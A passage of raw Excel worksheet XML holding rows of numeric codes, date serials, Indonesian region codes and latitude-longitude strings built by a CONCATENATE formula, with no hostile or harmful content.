        <v>19911</v>
      </c>
      <c r="Y1908" t="str">
        <f t="shared" si="29"/>
        <v>-6.94862,107.78712</v>
      </c>
    </row>
    <row r="1909" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1909">
        <v>169906</v>
      </c>
      <c r="B1909" s="1">
        <v>43889</v>
      </c>
      <c r="C1909">
        <v>0</v>
      </c>
      <c r="D1909" t="s">
        <v>85</v>
      </c>
      <c r="E1909" t="s">
        <v>23</v>
      </c>
      <c r="F1909" t="s">
        <v>6379</v>
      </c>
      <c r="G1909" t="s">
        <v>6380</v>
      </c>
      <c r="H1909" t="s">
        <v>26</v>
      </c>
      <c r="J1909" t="s">
        <v>2627</v>
      </c>
      <c r="K1909" t="s">
        <v>6381</v>
      </c>
      <c r="L1909" t="s">
        <v>6382</v>
      </c>
      <c r="M1909">
        <v>3211010009</v>
      </c>
      <c r="N1909">
        <v>3211010</v>
      </c>
      <c r="O1909">
        <v>3211</v>
      </c>
      <c r="P1909">
        <v>32</v>
      </c>
      <c r="Q1909" t="s">
        <v>2951</v>
      </c>
      <c r="R1909" t="s">
        <v>2952</v>
      </c>
      <c r="S1909" t="s">
        <v>1797</v>
      </c>
      <c r="T1909" t="s">
        <v>42</v>
      </c>
      <c r="U1909" s="5">
        <v>10777668</v>
      </c>
      <c r="V1909" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W1909" s="5">
        <v>-694315</v>
      </c>
      <c r="X1909" t="s">
        <v>18930</v>
      </c>
      <c r="Y1909" t="str">
        <f t="shared" si="29"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="1910" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1910">
        <v>170137</v>
      </c>
      <c r="B1910" s="1">
        <v>43889</v>
      </c>
      <c r="C1910">
        <v>0</v>
      </c>
      <c r="D1910" t="s">
        <v>22</v>
      </c>
      <c r="E1910" t="s">
        <v>23</v>
      </c>
      <c r="F1910" t="s">
        <v>6383</v>
      </c>
      <c r="G1910" t="s">
        <v>6384</v>
      </c>
      <c r="H1910" t="s">
        <v>26</v>
      </c>
      <c r="I1910" t="s">
        <v>6385</v>
      </c>
      <c r="J1910" t="s">
        <v>2627</v>
      </c>
      <c r="M1910">
        <v>3275020006</v>
      </c>
      <c r="N1910">
        <v>3275020</v>
      </c>
      <c r="O1910">
        <v>3275</v>
      </c>
      <c r="P1910">
        <v>32</v>
      </c>
      <c r="Q1910" t="s">
        <v>4024</v>
      </c>
      <c r="R1910" t="s">
        <v>828</v>
      </c>
      <c r="S1910" t="s">
        <v>41</v>
      </c>
      <c r="T1910" t="s">
        <v>42</v>
      </c>
      <c r="U1910" s="5">
        <v>10694099</v>
      </c>
      <c r="V1910" s="5" t="s">
        <v>16152</v>
      </c>
      <c r="W1910" s="5">
        <v>-627024</v>
      </c>
      <c r="X1910" t="s">
        <v>19912</v>
      </c>
      <c r="Y1910" t="str">
        <f t="shared" si="29"/>
        <v>-6.27024,106.94099</v>
      </c>
    </row>
    <row r="1911" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1911">
        <v>170340</v>
      </c>
      <c r="B1911" s="1">
        <v>43889</v>
      </c>
      <c r="C1911">
        <v>1</v>
      </c>
      <c r="D1911" t="s">
        <v>22</v>
      </c>
      <c r="E1911" t="s">
        <v>23</v>
      </c>
      <c r="F1911" t="s">
        <v>6386</v>
      </c>
      <c r="H1911" t="s">
        <v>26</v>
      </c>
      <c r="I1911" t="s">
        <v>1683</v>
      </c>
      <c r="J1911" t="s">
        <v>2622</v>
      </c>
      <c r="L1911" t="s">
        <v>6387</v>
      </c>
      <c r="M1911">
        <v>3578280006</v>
      </c>
      <c r="N1911">
        <v>3578280</v>
      </c>
      <c r="O1911">
        <v>3578</v>
      </c>
      <c r="P1911">
        <v>35</v>
      </c>
      <c r="Q1911" t="s">
        <v>6388</v>
      </c>
      <c r="R1911" t="s">
        <v>6389</v>
      </c>
      <c r="S1911" t="s">
        <v>1346</v>
      </c>
      <c r="T1911" t="s">
        <v>1221</v>
      </c>
      <c r="U1911" s="5">
        <v>11265286</v>
      </c>
      <c r="V1911" s="5" t="s">
        <v>16153</v>
      </c>
      <c r="W1911" s="5">
        <v>-725262</v>
      </c>
      <c r="X1911" t="s">
        <v>19913</v>
      </c>
      <c r="Y1911" t="str">
        <f t="shared" si="29"/>
        <v>-7.25262,112.65286</v>
      </c>
    </row>
    <row r="1912" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1912">
        <v>170361</v>
      </c>
      <c r="B1912" s="1">
        <v>43889</v>
      </c>
      <c r="C1912">
        <v>1</v>
      </c>
      <c r="D1912" t="s">
        <v>22</v>
      </c>
      <c r="E1912" t="s">
        <v>23</v>
      </c>
      <c r="F1912" t="s">
        <v>6390</v>
      </c>
      <c r="H1912" t="s">
        <v>26</v>
      </c>
      <c r="I1912" t="s">
        <v>908</v>
      </c>
      <c r="J1912" t="s">
        <v>5826</v>
      </c>
      <c r="L1912" t="s">
        <v>3266</v>
      </c>
      <c r="M1912">
        <v>3175050003</v>
      </c>
      <c r="N1912">
        <v>3175050</v>
      </c>
      <c r="O1912">
        <v>3175</v>
      </c>
      <c r="P1912">
        <v>31</v>
      </c>
      <c r="Q1912" t="s">
        <v>1740</v>
      </c>
      <c r="R1912" t="s">
        <v>1013</v>
      </c>
      <c r="S1912" t="s">
        <v>547</v>
      </c>
      <c r="T1912" t="s">
        <v>33</v>
      </c>
      <c r="U1912" s="5">
        <v>10691645</v>
      </c>
      <c r="V1912" s="5" t="s">
        <v>16154</v>
      </c>
      <c r="W1912" s="5">
        <v>-615807</v>
      </c>
      <c r="X1912" t="s">
        <v>19914</v>
      </c>
      <c r="Y1912" t="str">
        <f t="shared" si="29"/>
        <v>-6.15807,106.91645</v>
      </c>
    </row>
    <row r="1913" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1913">
        <v>170392</v>
      </c>
      <c r="B1913" s="1">
        <v>43889</v>
      </c>
      <c r="C1913">
        <v>1</v>
      </c>
      <c r="D1913" t="s">
        <v>22</v>
      </c>
      <c r="E1913" t="s">
        <v>23</v>
      </c>
      <c r="F1913" t="s">
        <v>6391</v>
      </c>
      <c r="G1913" t="s">
        <v>6392</v>
      </c>
      <c r="H1913" t="s">
        <v>26</v>
      </c>
      <c r="I1913" t="s">
        <v>4261</v>
      </c>
      <c r="J1913" t="s">
        <v>2627</v>
      </c>
      <c r="M1913">
        <v>3211010009</v>
      </c>
      <c r="N1913">
        <v>3211010</v>
      </c>
      <c r="O1913">
        <v>3211</v>
      </c>
      <c r="P1913">
        <v>32</v>
      </c>
      <c r="Q1913" t="s">
        <v>2951</v>
      </c>
      <c r="R1913" t="s">
        <v>2952</v>
      </c>
      <c r="S1913" t="s">
        <v>1797</v>
      </c>
      <c r="T1913" t="s">
        <v>42</v>
      </c>
      <c r="U1913" s="5">
        <v>10777350</v>
      </c>
      <c r="V1913" s="5" t="s">
        <v>16155</v>
      </c>
      <c r="W1913" s="5">
        <v>-694301</v>
      </c>
      <c r="X1913" t="s">
        <v>19915</v>
      </c>
      <c r="Y1913" t="str">
        <f t="shared" si="29"/>
        <v>-6.94301,107.77350</v>
      </c>
    </row>
    <row r="1914" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1914">
        <v>170561</v>
      </c>
      <c r="B1914" s="1">
        <v>43889</v>
      </c>
      <c r="C1914">
        <v>1</v>
      </c>
      <c r="D1914" t="s">
        <v>2648</v>
      </c>
      <c r="E1914" t="s">
        <v>23</v>
      </c>
      <c r="G1914" t="s">
        <v>6393</v>
      </c>
      <c r="H1914" t="s">
        <v>26</v>
      </c>
      <c r="J1914" t="s">
        <v>2580</v>
      </c>
      <c r="L1914" t="s">
        <v>6394</v>
      </c>
      <c r="M1914">
        <v>3172040005</v>
      </c>
      <c r="N1914">
        <v>3172040</v>
      </c>
      <c r="O1914">
        <v>3172</v>
      </c>
      <c r="P1914">
        <v>31</v>
      </c>
      <c r="Q1914" t="s">
        <v>1351</v>
      </c>
      <c r="R1914" t="s">
        <v>281</v>
      </c>
      <c r="S1914" t="s">
        <v>49</v>
      </c>
      <c r="T1914" t="s">
        <v>33</v>
      </c>
      <c r="U1914" s="5">
        <v>10689426</v>
      </c>
      <c r="V1914" s="5" t="s">
        <v>16156</v>
      </c>
      <c r="W1914" s="5">
        <v>-624105</v>
      </c>
      <c r="X1914" t="s">
        <v>18835</v>
      </c>
      <c r="Y1914" t="str">
        <f t="shared" si="29"/>
        <v>-6.24105,106.89426</v>
      </c>
    </row>
    <row r="1915" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1915">
        <v>170568</v>
      </c>
      <c r="B1915" s="1">
        <v>43889</v>
      </c>
      <c r="C1915">
        <v>1</v>
      </c>
      <c r="D1915" t="s">
        <v>22</v>
      </c>
      <c r="E1915" t="s">
        <v>23</v>
      </c>
      <c r="F1915" t="s">
        <v>6395</v>
      </c>
      <c r="H1915" t="s">
        <v>26</v>
      </c>
      <c r="I1915" t="s">
        <v>2300</v>
      </c>
      <c r="J1915" t="s">
        <v>2627</v>
      </c>
      <c r="L1915" t="s">
        <v>6396</v>
      </c>
      <c r="M1915">
        <v>3211010002</v>
      </c>
      <c r="N1915">
        <v>3211010</v>
      </c>
      <c r="O1915">
        <v>3211</v>
      </c>
      <c r="P1915">
        <v>32</v>
      </c>
      <c r="Q1915" t="s">
        <v>6397</v>
      </c>
      <c r="R1915" t="s">
        <v>2952</v>
      </c>
      <c r="S1915" t="s">
        <v>1797</v>
      </c>
      <c r="T1915" t="s">
        <v>42</v>
      </c>
      <c r="U1915" s="5">
        <v>10777072</v>
      </c>
      <c r="V1915" s="5" t="s">
        <v>16157</v>
      </c>
      <c r="W1915" s="5">
        <v>-695275</v>
      </c>
      <c r="X1915" t="s">
        <v>19916</v>
      </c>
      <c r="Y1915" t="str">
        <f t="shared" si="29"/>
        <v>-6.95275,107.77072</v>
      </c>
    </row>
    <row r="1916" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1916">
        <v>170625</v>
      </c>
      <c r="B1916" s="1">
        <v>43889</v>
      </c>
      <c r="C1916">
        <v>1</v>
      </c>
      <c r="D1916" t="s">
        <v>22</v>
      </c>
      <c r="E1916" t="s">
        <v>23</v>
      </c>
      <c r="F1916" t="s">
        <v>6398</v>
      </c>
      <c r="G1916" t="s">
        <v>6399</v>
      </c>
      <c r="H1916" t="s">
        <v>26</v>
      </c>
      <c r="I1916" t="s">
        <v>1477</v>
      </c>
      <c r="J1916" t="s">
        <v>2627</v>
      </c>
      <c r="L1916" t="s">
        <v>6400</v>
      </c>
      <c r="M1916">
        <v>3204110004</v>
      </c>
      <c r="N1916">
        <v>3204110</v>
      </c>
      <c r="O1916">
        <v>3204</v>
      </c>
      <c r="P1916">
        <v>32</v>
      </c>
      <c r="Q1916" t="s">
        <v>2163</v>
      </c>
      <c r="R1916" t="s">
        <v>2126</v>
      </c>
      <c r="S1916" t="s">
        <v>1464</v>
      </c>
      <c r="T1916" t="s">
        <v>42</v>
      </c>
      <c r="U1916" s="5">
        <v>10775491</v>
      </c>
      <c r="V1916" s="5" t="s">
        <v>16158</v>
      </c>
      <c r="W1916" s="5">
        <v>-696370</v>
      </c>
      <c r="X1916" t="s">
        <v>19917</v>
      </c>
      <c r="Y1916" t="str">
        <f t="shared" si="29"/>
        <v>-6.96370,107.75491</v>
      </c>
    </row>
    <row r="1917" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1917">
        <v>170633</v>
      </c>
      <c r="B1917" s="1">
        <v>43889</v>
      </c>
      <c r="C1917">
        <v>1</v>
      </c>
      <c r="D1917" t="s">
        <v>85</v>
      </c>
      <c r="E1917" t="s">
        <v>23</v>
      </c>
      <c r="F1917" t="s">
        <v>6401</v>
      </c>
      <c r="G1917" t="s">
        <v>6402</v>
      </c>
      <c r="H1917" t="s">
        <v>26</v>
      </c>
      <c r="J1917" t="s">
        <v>2627</v>
      </c>
      <c r="K1917" t="s">
        <v>6403</v>
      </c>
      <c r="L1917" t="s">
        <v>6404</v>
      </c>
      <c r="M1917">
        <v>3211010009</v>
      </c>
      <c r="N1917">
        <v>3211010</v>
      </c>
      <c r="O1917">
        <v>3211</v>
      </c>
      <c r="P1917">
        <v>32</v>
      </c>
      <c r="Q1917" t="s">
        <v>2951</v>
      </c>
      <c r="R1917" t="s">
        <v>2952</v>
      </c>
      <c r="S1917" t="s">
        <v>1797</v>
      </c>
      <c r="T1917" t="s">
        <v>42</v>
      </c>
      <c r="U1917" s="5">
        <v>10777668</v>
      </c>
      <c r="V1917" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W1917" s="5">
        <v>-694315</v>
      </c>
      <c r="X1917" t="s">
        <v>18930</v>
      </c>
      <c r="Y1917" t="str">
        <f t="shared" si="29"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="1918" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1918">
        <v>170873</v>
      </c>
      <c r="B1918" s="1">
        <v>43889</v>
      </c>
      <c r="C1918">
        <v>1</v>
      </c>
      <c r="D1918" t="s">
        <v>2648</v>
      </c>
      <c r="E1918" t="s">
        <v>23</v>
      </c>
      <c r="G1918" t="s">
        <v>6405</v>
      </c>
      <c r="H1918" t="s">
        <v>26</v>
      </c>
      <c r="J1918" t="s">
        <v>2336</v>
      </c>
      <c r="L1918" t="s">
        <v>6406</v>
      </c>
      <c r="M1918">
        <v>3173010002</v>
      </c>
      <c r="N1918">
        <v>3173010</v>
      </c>
      <c r="O1918">
        <v>3173</v>
      </c>
      <c r="P1918">
        <v>31</v>
      </c>
      <c r="Q1918" t="s">
        <v>4908</v>
      </c>
      <c r="R1918" t="s">
        <v>1481</v>
      </c>
      <c r="S1918" t="s">
        <v>62</v>
      </c>
      <c r="T1918" t="s">
        <v>33</v>
      </c>
      <c r="U1918" s="5">
        <v>10680814</v>
      </c>
      <c r="V1918" s="5" t="s">
        <v>16159</v>
      </c>
      <c r="W1918" s="5">
        <v>-620666</v>
      </c>
      <c r="X1918" t="s">
        <v>18984</v>
      </c>
      <c r="Y1918" t="str">
        <f t="shared" si="29"/>
        <v>-6.20666,106.80814</v>
      </c>
    </row>
    <row r="1919" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1919">
        <v>171183</v>
      </c>
      <c r="B1919" s="1">
        <v>43890</v>
      </c>
      <c r="C1919">
        <v>0</v>
      </c>
      <c r="D1919" t="s">
        <v>2648</v>
      </c>
      <c r="E1919" t="s">
        <v>23</v>
      </c>
      <c r="G1919" t="s">
        <v>6407</v>
      </c>
      <c r="H1919" t="s">
        <v>26</v>
      </c>
      <c r="J1919" t="s">
        <v>6408</v>
      </c>
      <c r="L1919" t="s">
        <v>6409</v>
      </c>
      <c r="M1919">
        <v>3174080001</v>
      </c>
      <c r="N1919">
        <v>3174080</v>
      </c>
      <c r="O1919">
        <v>3174</v>
      </c>
      <c r="P1919">
        <v>31</v>
      </c>
      <c r="Q1919" t="s">
        <v>694</v>
      </c>
      <c r="R1919" t="s">
        <v>695</v>
      </c>
      <c r="S1919" t="s">
        <v>32</v>
      </c>
      <c r="T1919" t="s">
        <v>33</v>
      </c>
      <c r="U1919" s="5">
        <v>10670477</v>
      </c>
      <c r="V1919" s="5" t="s">
        <v>16160</v>
      </c>
      <c r="W1919" s="5">
        <v>-616544</v>
      </c>
      <c r="X1919" t="s">
        <v>19918</v>
      </c>
      <c r="Y1919" t="str">
        <f t="shared" si="29"/>
        <v>-6.16544,106.70477</v>
      </c>
    </row>
    <row r="1920" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1920">
        <v>171256</v>
      </c>
      <c r="B1920" s="1">
        <v>43890</v>
      </c>
      <c r="C1920">
        <v>0</v>
      </c>
      <c r="D1920" t="s">
        <v>85</v>
      </c>
      <c r="E1920" t="s">
        <v>23</v>
      </c>
      <c r="F1920" t="s">
        <v>6410</v>
      </c>
      <c r="G1920" t="s">
        <v>6411</v>
      </c>
      <c r="H1920" t="s">
        <v>26</v>
      </c>
      <c r="J1920" t="s">
        <v>2627</v>
      </c>
      <c r="K1920" t="s">
        <v>6412</v>
      </c>
      <c r="L1920" t="s">
        <v>6413</v>
      </c>
      <c r="M1920">
        <v>3211010009</v>
      </c>
      <c r="N1920">
        <v>3211010</v>
      </c>
      <c r="O1920">
        <v>3211</v>
      </c>
      <c r="P1920">
        <v>32</v>
      </c>
      <c r="Q1920" t="s">
        <v>2951</v>
      </c>
      <c r="R1920" t="s">
        <v>2952</v>
      </c>
      <c r="S1920" t="s">
        <v>1797</v>
      </c>
      <c r="T1920" t="s">
        <v>42</v>
      </c>
      <c r="U1920" s="5">
        <v>10777668</v>
      </c>
      <c r="V1920" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W1920" s="5">
        <v>-694315</v>
      </c>
      <c r="X1920" t="s">
        <v>18930</v>
      </c>
      <c r="Y1920" t="str">
        <f t="shared" si="29"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="1921" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1921">
        <v>171297</v>
      </c>
      <c r="B1921" s="1">
        <v>43890</v>
      </c>
      <c r="C1921">
        <v>0</v>
      </c>
      <c r="D1921" t="s">
        <v>2648</v>
      </c>
      <c r="E1921" t="s">
        <v>23</v>
      </c>
      <c r="G1921" t="s">
        <v>6414</v>
      </c>
      <c r="H1921" t="s">
        <v>26</v>
      </c>
      <c r="J1921" t="s">
        <v>6415</v>
      </c>
      <c r="L1921" t="s">
        <v>6416</v>
      </c>
      <c r="M1921">
        <v>3172050005</v>
      </c>
      <c r="N1921">
        <v>3172050</v>
      </c>
      <c r="O1921">
        <v>3172</v>
      </c>
      <c r="P1921">
        <v>31</v>
      </c>
      <c r="Q1921" t="s">
        <v>358</v>
      </c>
      <c r="R1921" t="s">
        <v>358</v>
      </c>
      <c r="S1921" t="s">
        <v>49</v>
      </c>
      <c r="T1921" t="s">
        <v>33</v>
      </c>
      <c r="U1921" s="5">
        <v>10687011</v>
      </c>
      <c r="V1921" s="5" t="s">
        <v>16161</v>
      </c>
      <c r="W1921" s="5">
        <v>-626783</v>
      </c>
      <c r="X1921" t="s">
        <v>19919</v>
      </c>
      <c r="Y1921" t="str">
        <f t="shared" si="29"/>
        <v>-6.26783,106.87011</v>
      </c>
    </row>
    <row r="1922" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1922">
        <v>171358</v>
      </c>
      <c r="B1922" s="1">
        <v>43890</v>
      </c>
      <c r="C1922">
        <v>0</v>
      </c>
      <c r="D1922" t="s">
        <v>85</v>
      </c>
      <c r="E1922" t="s">
        <v>23</v>
      </c>
      <c r="F1922" t="s">
        <v>6417</v>
      </c>
      <c r="G1922" t="s">
        <v>6418</v>
      </c>
      <c r="H1922" t="s">
        <v>26</v>
      </c>
      <c r="J1922" t="s">
        <v>2627</v>
      </c>
      <c r="K1922" t="s">
        <v>6419</v>
      </c>
      <c r="L1922" t="s">
        <v>6420</v>
      </c>
      <c r="M1922">
        <v>3211010009</v>
      </c>
      <c r="N1922">
        <v>3211010</v>
      </c>
      <c r="O1922">
        <v>3211</v>
      </c>
      <c r="P1922">
        <v>32</v>
      </c>
      <c r="Q1922" t="s">
        <v>2951</v>
      </c>
      <c r="R1922" t="s">
        <v>2952</v>
      </c>
      <c r="S1922" t="s">
        <v>1797</v>
      </c>
      <c r="T1922" t="s">
        <v>42</v>
      </c>
      <c r="U1922" s="5">
        <v>10777668</v>
      </c>
      <c r="V1922" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W1922" s="5">
        <v>-694315</v>
      </c>
      <c r="X1922" t="s">
        <v>18930</v>
      </c>
      <c r="Y1922" t="str">
        <f t="shared" si="29"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="1923" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1923">
        <v>171395</v>
      </c>
      <c r="B1923" s="1">
        <v>43890</v>
      </c>
      <c r="C1923">
        <v>0</v>
      </c>
      <c r="D1923" t="s">
        <v>85</v>
      </c>
      <c r="E1923" t="s">
        <v>23</v>
      </c>
      <c r="F1923" t="s">
        <v>6421</v>
      </c>
      <c r="G1923" t="s">
        <v>6422</v>
      </c>
      <c r="H1923" t="s">
        <v>26</v>
      </c>
      <c r="J1923" t="s">
        <v>2627</v>
      </c>
      <c r="K1923" t="s">
        <v>6423</v>
      </c>
      <c r="L1923" t="s">
        <v>6424</v>
      </c>
      <c r="M1923">
        <v>3211010009</v>
      </c>
      <c r="N1923">
        <v>3211010</v>
      </c>
      <c r="O1923">
        <v>3211</v>
      </c>
      <c r="P1923">
        <v>32</v>
      </c>
      <c r="Q1923" t="s">
        <v>2951</v>
      </c>
      <c r="R1923" t="s">
        <v>2952</v>
      </c>
      <c r="S1923" t="s">
        <v>1797</v>
      </c>
      <c r="T1923" t="s">
        <v>42</v>
      </c>
      <c r="U1923" s="5">
        <v>10777668</v>
      </c>
      <c r="V1923" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W1923" s="5">
        <v>-694315</v>
      </c>
      <c r="X1923" t="s">
        <v>18930</v>
      </c>
      <c r="Y1923" t="str">
        <f t="shared" ref="Y1923:Y1986" si="30">CONCATENATE(X1923,",",V1923)</f>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="1924" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1924">
        <v>171465</v>
      </c>
      <c r="B1924" s="1">
        <v>43890</v>
      </c>
      <c r="C1924">
        <v>0</v>
      </c>
      <c r="D1924" t="s">
        <v>2648</v>
      </c>
      <c r="E1924" t="s">
        <v>23</v>
      </c>
      <c r="G1924" t="s">
        <v>6425</v>
      </c>
      <c r="H1924" t="s">
        <v>26</v>
      </c>
      <c r="J1924" t="s">
        <v>6426</v>
      </c>
      <c r="L1924" t="s">
        <v>6427</v>
      </c>
      <c r="M1924">
        <v>3174080005</v>
      </c>
      <c r="N1924">
        <v>3174080</v>
      </c>
      <c r="O1924">
        <v>3174</v>
      </c>
      <c r="P1924">
        <v>31</v>
      </c>
      <c r="Q1924" t="s">
        <v>2663</v>
      </c>
      <c r="R1924" t="s">
        <v>695</v>
      </c>
      <c r="S1924" t="s">
        <v>32</v>
      </c>
      <c r="T1924" t="s">
        <v>33</v>
      </c>
      <c r="U1924" s="5">
        <v>10670097</v>
      </c>
      <c r="V1924" s="5" t="s">
        <v>16162</v>
      </c>
      <c r="W1924" s="5">
        <v>-609719</v>
      </c>
      <c r="X1924" t="s">
        <v>19920</v>
      </c>
      <c r="Y1924" t="str">
        <f t="shared" si="30"/>
        <v>-6.09719,106.70097</v>
      </c>
    </row>
    <row r="1925" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1925">
        <v>171469</v>
      </c>
      <c r="B1925" s="1">
        <v>43890</v>
      </c>
      <c r="C1925">
        <v>0</v>
      </c>
      <c r="D1925" t="s">
        <v>85</v>
      </c>
      <c r="E1925" t="s">
        <v>23</v>
      </c>
      <c r="F1925" t="s">
        <v>6428</v>
      </c>
      <c r="G1925" t="s">
        <v>6429</v>
      </c>
      <c r="H1925" t="s">
        <v>26</v>
      </c>
      <c r="J1925" t="s">
        <v>2627</v>
      </c>
      <c r="K1925" t="s">
        <v>6430</v>
      </c>
      <c r="L1925" t="s">
        <v>6431</v>
      </c>
      <c r="M1925">
        <v>3211010009</v>
      </c>
      <c r="N1925">
        <v>3211010</v>
      </c>
      <c r="O1925">
        <v>3211</v>
      </c>
      <c r="P1925">
        <v>32</v>
      </c>
      <c r="Q1925" t="s">
        <v>2951</v>
      </c>
      <c r="R1925" t="s">
        <v>2952</v>
      </c>
      <c r="S1925" t="s">
        <v>1797</v>
      </c>
      <c r="T1925" t="s">
        <v>42</v>
      </c>
      <c r="U1925" s="5">
        <v>10777639</v>
      </c>
      <c r="V1925" s="5" t="s">
        <v>16163</v>
      </c>
      <c r="W1925" s="5">
        <v>-694389</v>
      </c>
      <c r="X1925" t="s">
        <v>18712</v>
      </c>
      <c r="Y1925" t="str">
        <f t="shared" si="30"/>
        <v>-6.94389,107.77639</v>
      </c>
    </row>
    <row r="1926" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1926">
        <v>171970</v>
      </c>
      <c r="B1926" s="1">
        <v>43890</v>
      </c>
      <c r="C1926">
        <v>1</v>
      </c>
      <c r="D1926" t="s">
        <v>2648</v>
      </c>
      <c r="E1926" t="s">
        <v>23</v>
      </c>
      <c r="G1926" t="s">
        <v>6432</v>
      </c>
      <c r="H1926" t="s">
        <v>26</v>
      </c>
      <c r="J1926" t="s">
        <v>6433</v>
      </c>
      <c r="L1926" t="s">
        <v>6434</v>
      </c>
      <c r="M1926">
        <v>3172080004</v>
      </c>
      <c r="N1926">
        <v>3172080</v>
      </c>
      <c r="O1926">
        <v>3172</v>
      </c>
      <c r="P1926">
        <v>31</v>
      </c>
      <c r="Q1926" t="s">
        <v>3084</v>
      </c>
      <c r="R1926" t="s">
        <v>141</v>
      </c>
      <c r="S1926" t="s">
        <v>49</v>
      </c>
      <c r="T1926" t="s">
        <v>33</v>
      </c>
      <c r="U1926" s="5">
        <v>10695797</v>
      </c>
      <c r="V1926" s="5" t="s">
        <v>16164</v>
      </c>
      <c r="W1926" s="5">
        <v>-618705</v>
      </c>
      <c r="X1926" t="s">
        <v>19921</v>
      </c>
      <c r="Y1926" t="str">
        <f t="shared" si="30"/>
        <v>-6.18705,106.95797</v>
      </c>
    </row>
    <row r="1927" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1927">
        <v>172060</v>
      </c>
      <c r="B1927" s="1">
        <v>43890</v>
      </c>
      <c r="C1927">
        <v>1</v>
      </c>
      <c r="D1927" t="s">
        <v>22</v>
      </c>
      <c r="E1927" t="s">
        <v>23</v>
      </c>
      <c r="F1927" t="s">
        <v>6435</v>
      </c>
      <c r="G1927" t="s">
        <v>6436</v>
      </c>
      <c r="H1927" t="s">
        <v>26</v>
      </c>
      <c r="I1927" t="s">
        <v>3024</v>
      </c>
      <c r="J1927" t="s">
        <v>3135</v>
      </c>
      <c r="L1927" t="s">
        <v>6437</v>
      </c>
      <c r="M1927">
        <v>3674060003</v>
      </c>
      <c r="N1927">
        <v>3674060</v>
      </c>
      <c r="O1927">
        <v>3674</v>
      </c>
      <c r="P1927">
        <v>36</v>
      </c>
      <c r="Q1927" t="s">
        <v>205</v>
      </c>
      <c r="R1927" t="s">
        <v>169</v>
      </c>
      <c r="S1927" t="s">
        <v>170</v>
      </c>
      <c r="T1927" t="s">
        <v>171</v>
      </c>
      <c r="U1927" s="5">
        <v>10669473</v>
      </c>
      <c r="V1927" s="5" t="s">
        <v>16165</v>
      </c>
      <c r="W1927" s="5">
        <v>-625286</v>
      </c>
      <c r="X1927" t="s">
        <v>19922</v>
      </c>
      <c r="Y1927" t="str">
        <f t="shared" si="30"/>
        <v>-6.25286,106.69473</v>
      </c>
    </row>
    <row r="1928" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1928">
        <v>172100</v>
      </c>
      <c r="B1928" s="1">
        <v>43890</v>
      </c>
      <c r="C1928">
        <v>1</v>
      </c>
      <c r="D1928" t="s">
        <v>22</v>
      </c>
      <c r="E1928" t="s">
        <v>23</v>
      </c>
      <c r="F1928" t="s">
        <v>6438</v>
      </c>
      <c r="G1928" t="s">
        <v>6439</v>
      </c>
      <c r="H1928" t="s">
        <v>26</v>
      </c>
      <c r="I1928" t="s">
        <v>367</v>
      </c>
      <c r="J1928" t="s">
        <v>2627</v>
      </c>
      <c r="L1928" t="s">
        <v>6440</v>
      </c>
      <c r="M1928">
        <v>3216081008</v>
      </c>
      <c r="N1928">
        <v>3216081</v>
      </c>
      <c r="O1928">
        <v>3216</v>
      </c>
      <c r="P1928">
        <v>32</v>
      </c>
      <c r="Q1928" t="s">
        <v>6441</v>
      </c>
      <c r="R1928" t="s">
        <v>2512</v>
      </c>
      <c r="S1928" t="s">
        <v>41</v>
      </c>
      <c r="T1928" t="s">
        <v>42</v>
      </c>
      <c r="U1928" s="5">
        <v>10707330</v>
      </c>
      <c r="V1928" s="5" t="s">
        <v>16166</v>
      </c>
      <c r="W1928" s="5">
        <v>-624678</v>
      </c>
      <c r="X1928" t="s">
        <v>19923</v>
      </c>
      <c r="Y1928" t="str">
        <f t="shared" si="30"/>
        <v>-6.24678,107.07330</v>
      </c>
    </row>
    <row r="1929" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1929">
        <v>172263</v>
      </c>
      <c r="B1929" s="1">
        <v>43891</v>
      </c>
      <c r="C1929" t="s">
        <v>6442</v>
      </c>
      <c r="D1929" t="s">
        <v>2648</v>
      </c>
      <c r="E1929" t="s">
        <v>23</v>
      </c>
      <c r="G1929" t="s">
        <v>6443</v>
      </c>
      <c r="H1929" t="s">
        <v>26</v>
      </c>
      <c r="J1929" t="s">
        <v>6444</v>
      </c>
      <c r="L1929" t="s">
        <v>6445</v>
      </c>
      <c r="M1929">
        <v>3175030001</v>
      </c>
      <c r="N1929">
        <v>3175030</v>
      </c>
      <c r="O1929">
        <v>3175</v>
      </c>
      <c r="P1929">
        <v>31</v>
      </c>
      <c r="Q1929" t="s">
        <v>1574</v>
      </c>
      <c r="R1929" t="s">
        <v>1563</v>
      </c>
      <c r="S1929" t="s">
        <v>547</v>
      </c>
      <c r="T1929" t="s">
        <v>33</v>
      </c>
      <c r="U1929" s="5">
        <v>10685295</v>
      </c>
      <c r="V1929" s="5" t="s">
        <v>16167</v>
      </c>
      <c r="W1929" s="5">
        <v>-613739</v>
      </c>
      <c r="X1929" t="s">
        <v>19924</v>
      </c>
      <c r="Y1929" t="str">
        <f t="shared" si="30"/>
        <v>-6.13739,106.85295</v>
      </c>
    </row>
